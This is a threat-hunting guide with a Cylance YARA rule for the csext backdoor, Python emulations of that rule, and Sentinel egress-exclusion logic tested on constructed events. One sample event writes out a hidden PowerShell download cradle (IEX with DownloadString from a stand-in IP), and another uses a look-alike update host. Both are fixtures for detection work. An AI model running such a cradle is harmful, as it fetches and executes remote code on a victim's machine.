The hypothesis is that the observed activity may indicate an adversary attempting to exfiltrate data or establish a foothold through a compromised or malicious HTTP endpoint. SOC teams should proactively hunt for this behaviour in Azure Sentinel (now Microsoft Sentinel) to surface lateral movement or data exfiltration attempts that traditional security controls may not flag.
YARA Rule
rule csext
{
    meta:
        author = "Cylance"
        date = "2014-12-02"
        description = "http://cylance.com/opcleaver"
    strings:
        // "Extentions" is the malware author's misspelling; keep it verbatim,
        // a "corrected" spelling would never match the samples.
        $s1 = "COM+ System Extentions"
        // Name the backdoor binary is dropped as.
        $s2 = "csext.exe"
        // Second artifact string carrying the same intentional misspelling.
        $s3 = "COM_Extentions_bin"
    condition:
        // All three strings must be present; none of them is unique enough alone.
        all of them
}
This YARA rule can be deployed wherever YARA scanning is available: on-disk file scans on endpoints, process memory scans, and sandbox or incident-response triage pipelines. Its detection logic contains three string patterns, and the condition requires all three to be present in the scanned object. Note that the strings carry no modifiers, so YARA matches them as ASCII only; if you want the rule to also fire on a UTF-16LE copy of the same text (for example in a VERSIONINFO resource), add the ascii wide modifiers to each string when you adapt it.
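As an added example (this is not code from the original page or from Cylance), the following Python stand-in reproduces the csext rule's matching semantics so the "all of them" condition and the ASCII-only default can be exercised offline without yara-python installed. The byte buffers it scans are constructed for the demonstration and are not real csext.exe samples.

```python
"""Minimal emulation of `rule csext { ... condition: all of them }`.

Added example, not part of the original page or the Cylance rule set. The
sample buffers below are constructed; they are not real malware samples.
"""

# The exact strings from the rule. "Extentions" is the malware author's
# misspelling and must be kept verbatim; "correcting" it breaks the rule.
CSEXT_STRINGS = {
    "$s1": b"COM+ System Extentions",
    "$s2": b"csext.exe",
    "$s3": b"COM_Extentions_bin",
}


def match_csext(data: bytes, wide: bool = False) -> dict:
    """Apply the rule's `all of them` condition to a byte buffer.

    Returns {"matched": bool, "hits": {ident: None | "ascii" | "wide"}}.
    wide=False mirrors the published rule (YARA's default is ascii only).
    wide=True behaves as if every string carried the `ascii wide` modifiers,
    i.e. a UTF-16LE copy of the text also counts as a hit.
    """
    hits = {}
    for ident, pattern in CSEXT_STRINGS.items():
        if pattern in data:
            hits[ident] = "ascii"
        elif wide and pattern.decode("ascii").encode("utf-16-le") in data:
            hits[ident] = "wide"
        else:
            hits[ident] = None
    return {"matched": all(hits.values()), "hits": hits}


def scan_samples() -> dict:
    """Run the matcher over constructed buffers and return the verdicts."""
    # Constructed: all three strings present as plain ASCII.
    ascii_sample = (
        b"MZ\x90\x00" + b"\x00" * 16
        + b"COM+ System Extentions\x00"
        + b"C:\\Windows\\System32\\csext.exe\x00"
        + b"COM_Extentions_bin\x00"
    )
    # Constructed: $s1 survives only as UTF-16LE (as a version resource
    # would store it); $s2 and $s3 are ASCII.
    wide_sample = (
        b"MZ\x90\x00"
        + "COM+ System Extentions".encode("utf-16-le")
        + b"\x00csext.exe\x00COM_Extentions_bin\x00"
    )
    # Constructed benign file that happens to share one string.
    benign = b"This updater is named csext.exe for legacy reasons."
    return {
        "ascii": match_csext(ascii_sample),
        "wide_as_published": match_csext(wide_sample),
        "wide_with_modifier": match_csext(wide_sample, wide=True),
        "benign": match_csext(benign),
    }


if __name__ == "__main__":
    for name, result in scan_samples().items():
        print(f"{name:20s} matched={result['matched']} hits={result['hits']}")
```

The "wide_as_published" case is the one to notice: the rule as written misses a sample whose only copy of the service name is UTF-16LE, which is why adding ascii wide is worth considering when you adapt the rule.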
The scenarios below are false-positive exclusions for the Sentinel hunt described in the hypothesis (they key on process name and destination URL); they do not apply to the YARA rule, which matches file contents. In every case match the exclusion on the parsed destination hostname, never on a substring of the URL, because a URL such as https://download.microsoft.com.evil.example/ contains the allowed string.
Scenario: A system administrator is using PowerShell to automate the deployment of a software update via a scheduled task.
Filter/Exclusion: Exclude events where the process name is powershell.exe and the command line runs a known deployment script (for example -File with a path on the deployment share) against an internal host. Do not exclude on -Command alone: attacker download cradles use the same switch.
Scenario: A SQL Server Agent job is running a script that connects to a remote HTTP endpoint to fetch configuration data.
Filter/Exclusion: Exclude events where the process name is sqlagent.exe and the destination host is a known internal configuration endpoint.
Scenario: A Windows Task Scheduler job is configured to run a legitimate tool like curl.exe or PowerShell's Invoke-WebRequest to pull a configuration file from a secure internal server.
Filter/Exclusion: For a task that launches an executable, the process making the request is curl.exe or powershell.exe itself, not taskhostw.exe (which hosts only DLL-based tasks) or schtasks.exe (which only creates and queries tasks). Exclude events where the process is one of those tools, its parent is the Task Scheduler service host (svchost.exe hosting the Schedule service), and the destination host is in a predefined internal domain list.
Scenario: A Docker container is running a service that makes outbound HTTP requests to a public API for license validation.
Filter/Exclusion: Exclude events where the process name includes docker and the destination host is the known license validation endpoint. A substring match on "docker" is weak on its own, so always pair it with the exact host.
Scenario: A Windows Update task is initiated by the Windows Update Agent to download and install patches from Microsoft.
Filter/Exclusion: There is no wuauserv.exe; the Windows Update Agent (wuauserv) and Delivery Optimization (DoSvc) run inside svchost.exe. Exclude events where the process is svchost.exe with -s wuauserv or -s DoSvc on its command line and the destination host is download.microsoft.com or another Microsoft update domain such as *.windowsupdate.com. A process actually named wuauserv.exe contacting those hosts is a name impersonation and should be investigated, not excluded.
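As an added example (not code from the original page or from any Sentinel content pack), the Python below prototypes the five exclusions above over constructed HTTP-egress events, so the allow-list logic can be sanity-checked before it is written as a KQL where clause. The event field names (process, parent, cmdline, parent_cmdline, url), the allow-list hosts and the deployment share path are assumptions for this demo, not a real schema or real infrastructure.

```python
from typing import Optional
from urllib.parse import urlsplit

# Constructed allow-lists for the demo; a real hunt would read these from a
# Sentinel watchlist or reference table.
INTERNAL_HOSTS = {"config.corp.example", "updates.corp.example"}
LICENSE_HOSTS = {"license.vendor.example"}
DEPLOY_SCRIPT_PREFIX = "\\\\deploy.corp.example\\updates\\"  # \\deploy.corp.example\updates\
WINDOWS_UPDATE_HOSTS = {"download.microsoft.com"}
WINDOWS_UPDATE_SUFFIXES = (".windowsupdate.com", ".delivery.mp.microsoft.com")


def host_of(url: str) -> str:
    """Parsed, lower-cased hostname. Matching on this rather than on a URL
    substring is what stops https://download.microsoft.com.evil.example/
    from satisfying the Windows Update exclusion."""
    return (urlsplit(url).hostname or "").lower()


def is_windows_update_host(host: str) -> bool:
    return host in WINDOWS_UPDATE_HOSTS or host.endswith(WINDOWS_UPDATE_SUFFIXES)


def exclusion_for(event: dict) -> Optional[str]:
    """Name of the scenario that explains the event as benign, or None if
    the event stays in the hunt results."""
    proc = event["process"].lower()
    cmd = event.get("cmdline", "").lower()
    parent = event.get("parent", "").lower()
    parent_cmd = event.get("parent_cmdline", "").lower()
    host = host_of(event["url"])
    internal = host in INTERNAL_HOSTS

    # 1. Scripted update deployment: key on the deployment script path, not
    #    on a bare "-Command" substring that attacker one-liners also carry.
    if (proc == "powershell.exe" and "-file" in cmd
            and DEPLOY_SCRIPT_PREFIX.lower() in cmd and internal):
        return "powershell-update-deployment"
    # 2. SQL Server Agent job step pulling config from an internal host.
    if proc == "sqlagent.exe" and internal:
        return "sql-agent-config-fetch"
    # 3. Scheduled task: curl/powershell launched by the Schedule service
    #    host (svchost.exe -s Schedule); schtasks.exe never runs the task.
    if (proc in ("curl.exe", "powershell.exe") and parent == "svchost.exe"
            and "-s schedule" in parent_cmd and internal):
        return "scheduled-task-config-pull"
    # 4. Container runtime validating a licence against one known endpoint.
    if "docker" in proc and host in LICENSE_HOSTS:
        return "docker-license-check"
    # 5. Windows Update: wuauserv and DoSvc live inside svchost.exe. There is
    #    no wuauserv.exe, so a process with that name is never excluded.
    if (proc == "svchost.exe" and ("-s wuauserv" in cmd or "-s dosvc" in cmd)
            and is_windows_update_host(host)):
        return "windows-update"
    return None


def triage(events: list) -> dict:
    """Map event id -> exclusion name (or None) for every event."""
    return {e["id"]: exclusion_for(e) for e in events}


def remaining(events: list) -> list:
    """Ids of the events the analyst still has to look at."""
    return [e["id"] for e in events if exclusion_for(e) is None]


# Constructed HTTP-egress events in the assumed schema (not real telemetry).
SAMPLE_EVENTS = [
    {"id": 1, "process": "powershell.exe", "parent": "svchost.exe",
     "parent_cmdline": "svchost.exe -k netsvcs -p -s Schedule",
     "cmdline": "powershell.exe -ExecutionPolicy Bypass -File \\\\deploy.corp.example\\updates\\push.ps1",
     "url": "https://updates.corp.example/manifest.json"},
    {"id": 2, "process": "SQLAGENT.EXE", "parent": "services.exe",
     "url": "http://config.corp.example/agent.cfg"},
    {"id": 3, "process": "curl.exe", "parent": "svchost.exe",
     "parent_cmdline": "svchost.exe -k netsvcs -p -s Schedule",
     "cmdline": "curl.exe -sS -o app.conf https://config.corp.example/app.conf",
     "url": "https://config.corp.example/app.conf"},
    {"id": 4, "process": "com.docker.backend.exe", "parent": "Docker Desktop.exe",
     "url": "https://license.vendor.example/v1/validate"},
    {"id": 5, "process": "svchost.exe", "parent": "services.exe",
     "cmdline": "svchost.exe -k netsvcs -p -s wuauserv",
     "url": "https://download.microsoft.com/download/1/2/3/kb.cab"},
    # Name impersonation: nothing legitimate runs as wuauserv.exe.
    {"id": 6, "process": "wuauserv.exe", "parent": "explorer.exe",
     "url": "https://download.microsoft.com/download/1/2/3/kb.cab"},
    # Look-alike host that a URL-substring exclusion would wrongly accept.
    {"id": 7, "process": "svchost.exe", "parent": "services.exe",
     "cmdline": "svchost.exe -k netsvcs -p -s wuauserv",
     "url": "https://download.microsoft.com.evil.example/payload"},
    # Office-spawned download cradle: stays in the results.
    {"id": 8, "process": "powershell.exe", "parent": "winword.exe",
     "cmdline": "powershell.exe -nop -w hidden -Command IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a')",
     "url": "http://198.51.100.7/a"},
]

if __name__ == "__main__":
    for eid, why in triage(SAMPLE_EVENTS).items():
        print(f"event {eid}: {'excluded: ' + why if why else 'REVIEW'}")
```

Events 6, 7 and 8 are the ones that must survive the filter: a fake wuauserv.exe, a look-alike update host, and an Office-spawned PowerShell cradle would all have been dropped by the looser process-name and URL-substring matches in the original wording.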